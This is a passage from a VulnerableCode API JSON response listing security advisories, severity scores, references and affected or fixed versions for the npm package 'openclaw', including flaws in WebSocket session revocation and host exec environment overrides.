                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41376",
                "GHSA-rg8m-3943-vm6q"
            ],
            "risk_score": 3.0,
            "exploitability": "0.5",
            "weighted_severity": "5.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1j3m-fecr-f7cn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90837?format=api",
            "vulnerability_id": "VCID-1p3b-pfnn-x7ad",
            "summary": "Duplicate Advisory: OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2pr2-hcv6-7gwv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-89hr-6x2p-8xjv",
                    "reference_id": "GHSA-89hr-6x2p-8xjv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-89hr-6x2p-8xjv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-89hr-6x2p-8xjv"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1p3b-pfnn-x7ad"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89787?format=api",
            "vulnerability_id": "VCID-1p5p-eth5-3ufu",
            "summary": "OpenClaw: Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n## Summary\nIn affected versions, the host exec environment override policy does not cover proxy, TLS, Docker, and Git TLS control variables.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28: host exec env policy still missed proxy, TLS, Docker, and Git TLS variables until 4d912e0451 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d912e04519b4bd53b248437c53748cdebce9a41` — 2026-03-31T21:25:36+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41330",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0286",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02913",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02906",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41330"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41330",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41330"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9gp8-hjxr-6f34",
                    "reference_id": "GHSA-9gp8-hjxr-6f34",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9gp8-hjxr-6f34"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
